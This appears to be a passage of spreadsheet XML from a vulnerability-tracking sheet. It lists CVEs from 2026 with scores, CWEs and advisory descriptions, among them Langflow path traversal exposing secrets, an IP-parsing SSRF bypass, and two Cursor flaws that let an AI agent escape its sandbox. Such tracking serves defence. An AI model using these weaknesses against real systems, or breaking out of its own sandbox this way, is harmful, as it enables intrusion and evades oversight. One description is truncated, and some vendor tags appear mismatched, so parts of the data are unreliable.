      <c r="G961" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H961" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J961" s="5" t="inlineStr"/>
      <c r="K961" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L961" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="C962" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E962" s="5" t="inlineStr"/>
      <c r="F962" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G962" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H96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62" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J962" s="5" t="inlineStr"/>
      <c r="K962" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L962" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="C963" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E963" s="5" t="inlineStr"/>
      <c r="F963" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G963" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H963" s="5" t="inlineStr"/>
      <c r="I963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J963" s="5" t="inlineStr"/>
      <c r="K963" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15140</t>
        </is>
      </c>
      <c r="C964" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E964" s="5" t="inlineStr"/>
      <c r="F964" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G964" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H964" s="5" t="inlineStr"/>
      <c r="I964" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J964" s="5" t="inlineStr"/>
      <c r="K964" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L964" s="5" t="inlineStr">
        <is>
          <t>A privilege-escalation issue in the Portworx Operator when deployed on Red Hat OpenShift (OCP). Only under specific conditions during the initial provisioning of a Portworx storage cluster, a user holding only limited, namespace-scoped permissions could cause the operator to grant broader access than intended, potentially resulting in elevated privileges within the Kubernetes cluster.</t>
        </is>
      </c>
      <c r="M964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15140</t>
        </is>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18905</t>
        </is>
      </c>
      <c r="C965" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E965" s="5" t="inlineStr"/>
      <c r="F965" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G965" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H965" s="5" t="inlineStr"/>
      <c r="I965" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J965" s="5" t="inlineStr"/>
      <c r="K965" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L965" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway (`mcp-contextforge-gateway`) &lt;= v1.0.6 MCP Context Forge could allow a remote authenticated attacker to obtain sensitive information due to a DNS rebinding vulnerability during tool invocation.</t>
        </is>
      </c>
      <c r="M965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18905</t>
        </is>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19283</t>
        </is>
      </c>
      <c r="C966" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E966" s="5" t="inlineStr"/>
      <c r="F966" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G966" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H966" s="5" t="inlineStr"/>
      <c r="I966" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J966" s="5" t="inlineStr"/>
      <c r="K966" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L966" s="5" t="inlineStr">
        <is>
          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated remote attacker to obtain sensitive information, caused by missing destination namespace validation when copying etcd mTLS client credentials from the openshift-etcd system namespace into an attacker-controlled namespace.</t>
        </is>
      </c>
      <c r="M966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19283</t>
        </is>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19304</t>
        </is>
      </c>
      <c r="C967" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E967" s="5" t="inlineStr"/>
      <c r="F967" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G967" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H967" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I967" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J967" s="5" t="inlineStr"/>
      <c r="K967" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L967" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to obtain sensitive information from internal services due to a URL parser discrepancy.</t>
        </is>
      </c>
      <c r="M967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19304</t>
        </is>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19306</t>
        </is>
      </c>
      <c r="C968" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E968" s="5" t="inlineStr"/>
      <c r="F968" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G968" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H968" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I968" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J968" s="5" t="inlineStr"/>
      <c r="K968" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L968" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 allows an authenticated attacker to read arbitrary files from the server filesystem — including server secret material (secret_key, JWT signing keys, the application database, /proc/self/environ, and other tenants' upload directories) — by supplying absolute paths or traversal sequences in the files parameter of an authenticated build request. The file contents were embedded as text attachments in the language model prompt and transmitted to the configured model endpoint, resulting in confidential data exfiltration. This bypassed the LANGFLOW_RESTRICT_LOCAL_FILE_ACCESS=true containment boundary, which was enforced for other file-reading components but not for the Chat Input to Message attachment pipeline.</t>
        </is>
      </c>
      <c r="M968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19306</t>
        </is>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28802</t>
        </is>
      </c>
      <c r="C969" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E969" s="5" t="inlineStr"/>
      <c r="F969" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G969" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H969" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I969" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J969" s="5" t="inlineStr"/>
      <c r="K969" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L969" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. From version 1.6.5 to before version 1.6.7, previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected.. This issue has been patched in version 1.6.7.</t>
        </is>
      </c>
      <c r="M969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28802</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44293</t>
        </is>
      </c>
      <c r="C970" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E970" s="5" t="inlineStr"/>
      <c r="F970" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G970" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H970" s="5" t="inlineStr">
        <is>
          <t>protobufjs_project:protobufjs</t>
        </is>
      </c>
      <c r="I970" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L970" s="5" t="inlineStr">
        <is>
          <t>protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.6 and 8.0.2, protobufjs generated JavaScript for toObject conversion could include an unsafe expression derived from a schema-controlled bytes field default value. A crafted descriptor with a non-string default value for a bytes field could cause attacker-controlled code to be emitted into the generated conversion function. This vulnerability is fixed in 7.5.6 and 8.0.2.</t>
        </is>
      </c>
      <c r="M970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44293</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44495</t>
        </is>
      </c>
      <c r="C971" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E971" s="5" t="inlineStr"/>
      <c r="F971" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G971" s="5" t="inlineStr">
        <is>
          <t>java, kubernetes, node.js</t>
        </is>
      </c>
      <c r="H971" s="5" t="inlineStr">
        <is>
          <t>axios:axios, redhat:advanced_cluster_management_for_kubernetes, redhat:advanced_cluster_security, redhat:ansible_automation_platform, redhat:data_grid, redhat:developer_hub, redhat:discovery, redhat:openshift_container_platform, redhat:openshift_dev_spaces, redhat:openshift_service_mesh</t>
        </is>
      </c>
      <c r="I971" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915, CWE-94</t>
        </is>
      </c>
      <c r="L971" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 0.19.0 to before 0.31.1 and 1.15.2, Axios contains prototype-pollution gadgets in request config processing. If another vulnerability in the same JavaScript process has already polluted Object.prototype.transformResponse, affected Axios versions may treat that inherited value as request configuration or as an option validator. Axios does not itself create the prototype pollution. Exploitability requires a separate prototype-pollution vulnerability or equivalent attacker control over Object.prototype before Axios creates a request. This vulnerability is fixed in 0.31.1 and 1.15.2.</t>
        </is>
      </c>
      <c r="M971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44495</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54493</t>
        </is>
      </c>
      <c r="C972" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E972" s="5" t="inlineStr"/>
      <c r="F972" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G972" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H972" s="5" t="inlineStr"/>
      <c r="I972" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L972" s="5" t="inlineStr">
        <is>
          <t>Koel is a free, open-source music streaming solution. Prior to 9.7.0, the Subsonic-compatible createInternetRadioStation.view and updateInternetRadioStation.view routes accept an authenticated user's streamUrl without the SafeUrl and HasAudioContentType checks used by the regular radio API. app/Http/Requests/Subsonic/CreateInternetRadioStationRequest.php and app/Http/Requests/Subsonic/UpdateInternetRadioStationRequest.php pass the stored URL through app/Services/RadioService.php to app/Services/Radio/RadioStreamProxy.php, where RadioStreamProxy::openStream() calls fopen($url, 'r', false, $context). Streaming /radio/stream/{id} returns the upstream response body, allowing access to loopback, RFC1918, Docker bridge, metadata, or other internal HTTP services reachable from the Koel server. This issue is fixed in version 9.7.0.</t>
        </is>
      </c>
      <c r="M972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54493</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57171</t>
        </is>
      </c>
      <c r="C973" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E973" s="5" t="inlineStr"/>
      <c r="F973" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G973" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H973" s="5" t="inlineStr"/>
      <c r="I973" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L973" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the catalog-generate, profile-generate, and ssp-generate author commands write generated Markdown to an attacker-influenced output path without path-traversal validation, allowing arbitrary file write outside the Trestle workspace. These commands join the user-supplied output argument onto the Trestle root and write to the result, but guard it only with an is_directory_name_allowed() task-name-collision check rather than the PathSecurityValidator.validate_local_path() guard used by the jinja command, so an absolute path or one containing traversal sequences escapes the workspace and writes files under an attacker-chosen location as the invoking process owner. The security boundary is crossed when a trusted CI job, shared service, or wrapper derives the output argument from repository-controlled, tenant-controlled, or otherwise untrusted data while expecting output to stay inside the workspace. When --force-overwrite is used, the selected output directory is first recursively deleted, extending the primitive to destruction of an attacker-chosen directory tree and enabling indirect code execution by overwriting files a pipeline later runs. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57171</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66738</t>
        </is>
      </c>
      <c r="C974" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E974" s="5" t="inlineStr"/>
      <c r="F974" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G974" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H974" s="5" t="inlineStr"/>
      <c r="I974" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L974" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains a code injection vulnerability in SQLite-backed installations. The navigation menu endpoint improperly handles array-typed user input, which bypasses input sanitization and allows the value to break out of an internal quoted string context when evaluated as PHP. An authenticated attacker with at minimum editor (redacteur) privileges can submit a single crafted GET request to /ecrire/?exec=navigation to execute arbitrary OS commands in the web server process. MySQL-backed installations are not affected.</t>
        </is>
      </c>
      <c r="M974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66738</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66767</t>
        </is>
      </c>
      <c r="C975" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E975" s="5" t="inlineStr"/>
      <c r="F975" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G975" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H975" s="5" t="inlineStr"/>
      <c r="I975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L975" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Application Server for ABAP and ABAP Platform allows an unauthenticated user to send a specially crafted packet that triggers reprocessing of a previously buffered user request, potentially hijacking another user's session under narrow timing conditions. Successful exploitation could result in high impact on confidentiality and integrity, with low impact on availability of the application.</t>
        </is>
      </c>
      <c r="M975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66767</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69192</t>
        </is>
      </c>
      <c r="C976" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E976" s="5" t="inlineStr"/>
      <c r="F976" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G976" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H976" s="5" t="inlineStr"/>
      <c r="I976" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918</t>
        </is>
      </c>
      <c r="L976" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.3.1, Address4 accepts an octet written with a leading zero and decodes it as decimal, while the WHATWG URL host parser, inet_aton, and getaddrinfo all decode a leading zero as octal. The library and the network stack therefore disagree about which host a string names. new Address4('012.0.0.1') reports correctForm() of 12.0.0.1 and isPrivate() of false, but fetch('http://012.0.0.1/') connects to 10.0.0.1. An application that builds a network trust-boundary decision on these checks, for example a filter intended to block Server-Side Request Forgery, or SSRF, will classify an internal target as external and allow the request. The defect is in the parse gate rather than in any one classifier, so every consumer of Address4 inherits it: isPrivate(), isLoopback(), isLinkLocal(), isCGNAT(), isInSubnet(), isHostInSubnet(), and correctForm() are all computed from the mis-decoded octets. This issue is fixed in version 10.3.1.</t>
        </is>
      </c>
      <c r="M976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69192</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69683</t>
        </is>
      </c>
      <c r="C977" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E977" s="5" t="inlineStr"/>
      <c r="F977" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G977" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H977" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L977" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69683</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70479</t>
        </is>
      </c>
      <c r="C978" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E978" s="5" t="inlineStr"/>
      <c r="F978" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G978" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H978" s="5" t="inlineStr"/>
      <c r="I978" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L978" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, with WEB_LOADER_ENGINE=playwright, the Playwright web loader validates only the top-level page request and lets sub-resource requests pass unvalidated. A page supplied by an authenticated user can use JavaScript to reach blocked internal addresses, and returned DOM can include data read from those addresses in web-search or RAG output. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70479</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73217</t>
        </is>
      </c>
      <c r="C979" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E979" s="5" t="inlineStr"/>
      <c r="F979" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G979" s="5" t="inlineStr">
        <is>
          <t>microsoft, python</t>
        </is>
      </c>
      <c r="H979" s="5" t="inlineStr"/>
      <c r="I979" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L979" s="5" t="inlineStr">
        <is>
          <t>Cursor is a code editor built for programming with AI. Prior to 3.1.2, Cursor IDE for macOS allows an agent running in Auto-Run Sandbox mode to replace a virtual environment's Python executable with a malicious wrapper that the Microsoft Python extension invokes outside the sandbox, allowing arbitrary host commands with the user's privileges, including modifying files outside the workspace and launching applications. This issue is fixed in version 3.1.2.</t>
        </is>
      </c>
      <c r="M979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73217</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73218</t>
        </is>
      </c>
      <c r="C980" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E980" s="5" t="inlineStr"/>
      <c r="F980" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G980" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H980" s="5" t="inlineStr"/>
      <c r="I980" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L980" s="5" t="inlineStr">
        <is>
          <t>Cursor is a code editor built for programming with AI. Prior to 3.0.0, Cursor IDE for macOS allows an agent running in Auto-Run Sandbox mode, when Docker Desktop and the Dev Containers CLI are installed, to launch a privileged container and mount Docker's virtiofs0, granting read and write access to the user's home directory and enabling host command execution with the user's privileges without an additional permission prompt. This issue is fixed in version 3.0.0.</t>
        </is>
      </c>
      <c r="M980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73218</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77775</t>
        </is>
      </c>
      <c r="C981" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E981" s="5" t="inlineStr"/>
      <c r="F981" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G981" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
